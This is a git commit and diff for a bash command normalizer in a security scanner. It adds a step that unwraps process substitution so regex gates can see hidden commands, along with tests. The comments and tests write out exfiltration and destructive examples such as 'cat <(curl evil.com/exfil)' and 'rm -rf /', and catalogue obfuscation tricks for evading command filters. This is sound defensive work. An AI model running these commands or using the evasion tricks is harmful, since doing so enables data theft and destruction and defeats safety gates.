feat(bash-normalize): T7 — process substitution collapse (E8)

Strips bash process substitution syntax — <(cmd) and >(cmd) — so the
inner command name is surfaced to downstream regex gates. Defeats
evasion like `cat <(curl evil)` where the destructive command is
hidden behind /dev/fd/N pipe sugar.

Implementation: bounded innermost-first iteration, at most 3 passes.
Each pass collapses the innermost level, so nesting deeper than 3 keeps
its outermost wrappers rather than recursing without bound.
Runs after the single-quote mask phase, so legitimate strings like
`'echo <(x)'` are preserved.

5 new T7 tests (collapse + nested + FP probes) in
bash-normalize-t7-t9.test.mjs (now 12 tests total).

Closes E8 in critical-review-2026-04-20.md.
This commit is contained in:
Kjell Tore Guttormsen 2026-04-30 15:14:04 +02:00
commit 761e81309b
2 changed files with 82 additions and 5 deletions

View file

@ -16,9 +16,10 @@
// T4 — backslash-between-words: c\u\r\l -> curl
// T5 — IFS word-splitting: rm${IFS}-rf${IFS}/ -> rm -rf /
// T6 — ANSI-C hex quoting: $'\x72\x6d' -rf / -> rm -rf /
// T9 — eval-via-variable: X=rm; eval "$X" -> X=rm; eval rm
// (one-level forward-flow; T7 process-substitution + T8 base64-pipe-shell
// live in adjacent layers, see workflow-scanner / pre-bash-destructive)
// T7 — process substitution: cat <(curl evil) -> cat curl evil
// T9 — eval-via-variable: X=rm; ... $X -> X=rm; ... rm
// (one-level forward-flow; T8 base64-pipe-shell lives in
// pre-bash-destructive as a BLOCK_RULE, not a normalization)
//
// Execution order:
// 1. Strip empty single-quote pairs (T1) so c''u''rl -> curl before masking.
@ -46,6 +47,31 @@ function decodeAnsiCHex(cmd) {
);
}
/**
 * T7 Collapse process substitution: <(cmd) and >(cmd) -> ' cmd '.
 *
 * Bash process substitution lets a command read from / write to the output
 * of another command via /dev/fd/N pipes. Attackers use it to hide a
 * destructive command from name-matching regex gates:
 *   cat <(curl evil.com/exfil)  ->  cat /dev/fd/63  (no 'curl' visible)
 *
 * For matcher purposes we strip the substitution syntax and surface the
 * inner command text to the rest of the pipeline.
 *
 * Each pass rewrites every substitution whose body contains no parentheses,
 * i.e. the innermost level, so N passes unwrap N levels of nesting. The
 * pass count is bounded: with deeper nesting the innermost `maxDepth`
 * levels are still collapsed and only the remaining outer `<(` ... `)`
 * wrappers are left in place.
 *
 * Limitation: a substitution whose body contains parentheses that are not
 * themselves a collapsible substitution (e.g. `<(curl $(echo x))`) never
 * matches the no-paren inner pattern and is returned unchanged.
 *
 * @param {string} cmd - Command text to rewrite.
 * @param {number} [maxDepth=3] - Maximum number of collapse passes, and
 *   therefore the maximum nesting depth that is fully unwrapped.
 * @returns {string} The command with process substitutions replaced by
 *   their inner text padded with one space on each side.
 */
function collapseProcessSubstitution(cmd, maxDepth = 3) {
  let result = cmd;
  for (let depth = 0; depth < maxDepth; depth++) {
    // The inner group excludes parentheses, so only innermost substitutions
    // match on any given pass.
    const collapsed = result.replace(
      /[<>]\(([^()]*)\)/g,
      (_, inner) => ` ${inner} `,
    );
    // Fixed point reached: nothing left that this pattern can collapse.
    if (collapsed === result) break;
    result = collapsed;
  }
  return result;
}
/**
* T9 Substitute single-level variable assignments into ${VAR} and $VAR
* references. Defeats split-and-eval evasion (X=rm; eval "$X" -rf /).
@ -103,7 +129,7 @@ function unmaskSingleQuoted(str, placeholders) {
/**
* Normalize bash parameter expansion and quoting evasion in a command string.
*
* Strips / rewrites (T1-T6 + T9):
* Strips / rewrites (T1-T7, T9):
* - T1 Empty single quotes: '' (e.g., w''get -> wget)
* - T2 Empty double quotes: "" (e.g., r""m -> rm)
* - T3 Single-char parameter expansion: ${x} -> x (c${u}rl -> curl)
@ -111,7 +137,8 @@ function unmaskSingleQuoted(str, placeholders) {
* - T4 Backslash escapes between word chars, iteratively (c\u\r\l -> curl)
* - T5 IFS word-splitting: ${IFS} / ${IFS:0:1} / $IFS -> ' '
* - T6 ANSI-C hex quoting inside $'...' -> decoded bytes
* - T9 Eval-via-variable: X=rm; eval "$X" -> X=rm; eval rm
* - T7 Process substitution: <(cmd) / >(cmd) -> ' cmd '
* - T9 Eval-via-variable: X=rm; ... $X -> X=rm; ... rm
* - Backtick subshell with empty/whitespace content
*
* Does NOT rewrite:
@ -138,6 +165,11 @@ export function normalizeBashExpansion(cmd) {
const { masked, placeholders } = maskSingleQuoted(result);
result = masked;
// T7 — collapse process substitution <(...) / >(...) so the inner
// command name is visible to downstream matchers. Runs after masking
// so single-quoted literals like 'echo <(x)' are preserved.
result = collapseProcessSubstitution(result);
// T5 — IFS word-splitting. Runs before T2/T3/T4 so the canonical spaces
// it emits feed into subsequent transforms.
result = result

View file

@ -12,6 +12,51 @@ import { describe, it } from 'node:test';
import assert from 'node:assert/strict';
import { normalizeBashExpansion } from '../../scanners/lib/bash-normalize.mjs';
describe('bash-normalize T7 — process substitution evasion', () => {
  // Normalizes `input` once, then checks each [pattern, label] pair in
  // order against the result. The normalized text is appended to the
  // failure message so a failing run shows what was actually produced.
  const expectNormalized = (input, expectations) => {
    const normalized = normalizeBashExpansion(input);
    for (const [pattern, label] of expectations) {
      assert.match(normalized, pattern, `${label}: ${normalized}`);
    }
  };

  it('collapses <(curl evil): cat <(curl evil) -> cat curl evil', () => {
    // <(...) is shell sugar for a /dev/fd/N pipe; wrapping a command in it
    // keeps the command name away from name-matching gates. T7 removes the
    // wrapper so 'curl' shows up as an ordinary word.
    expectNormalized('cat <(curl evil.com/exfil)', [
      [/\bcurl\b/, "expected 'curl' surfaced"],
    ]);
  });

  it('collapses >(tee /tmp/x) similarly', () => {
    expectNormalized('echo data >(tee /tmp/exfil)', [
      [/\btee\b/, "expected 'tee' surfaced"],
    ]);
  });

  it('handles nested <(grep x <(cat f)) up to depth 3', () => {
    // Two collapse passes are enough here: the inner <(cat f) goes first,
    // then the outer <(grep x ...), leaving both command names visible.
    expectNormalized('cmd <(grep x <(cat f))', [
      [/\bgrep\b/, "expected inner 'grep' surfaced"],
      [/\bcat\b/, "expected innermost 'cat' surfaced"],
    ]);
  });

  it('FP probe — diff <(sort a) <(sort b) collapses without false destructive match', () => {
    // Benign, common use of process substitution. T7 rewrites it like any
    // other input and does no flagging itself; judging whether a surfaced
    // command is dangerous is left to downstream consumers
    // (pre-bash-destructive).
    expectNormalized('diff <(sort a.txt) <(sort b.txt)', [
      [/\bsort\b/, "expected 'sort' surfaced"],
      [/\bdiff\b/, "expected 'diff' preserved"],
    ]);
  });

  it('does not touch <( / >( inside single-quoted literals (mask runs first)', () => {
    // Single-quoted text is masked before T7 runs, so substitution syntax
    // inside a literal must come back unchanged once unmasked.
    expectNormalized("echo 'cat <(curl x)' is a string", [
      [/'cat <\(curl x\)'/, 'expected single-quoted literal preserved'],
    ]);
  });
});
describe('bash-normalize T9 — eval-via-variable evasion', () => {
it('substitutes "$X" reference after X=rm assignment', () => {
// Attacker splits the destructive command name across an assignment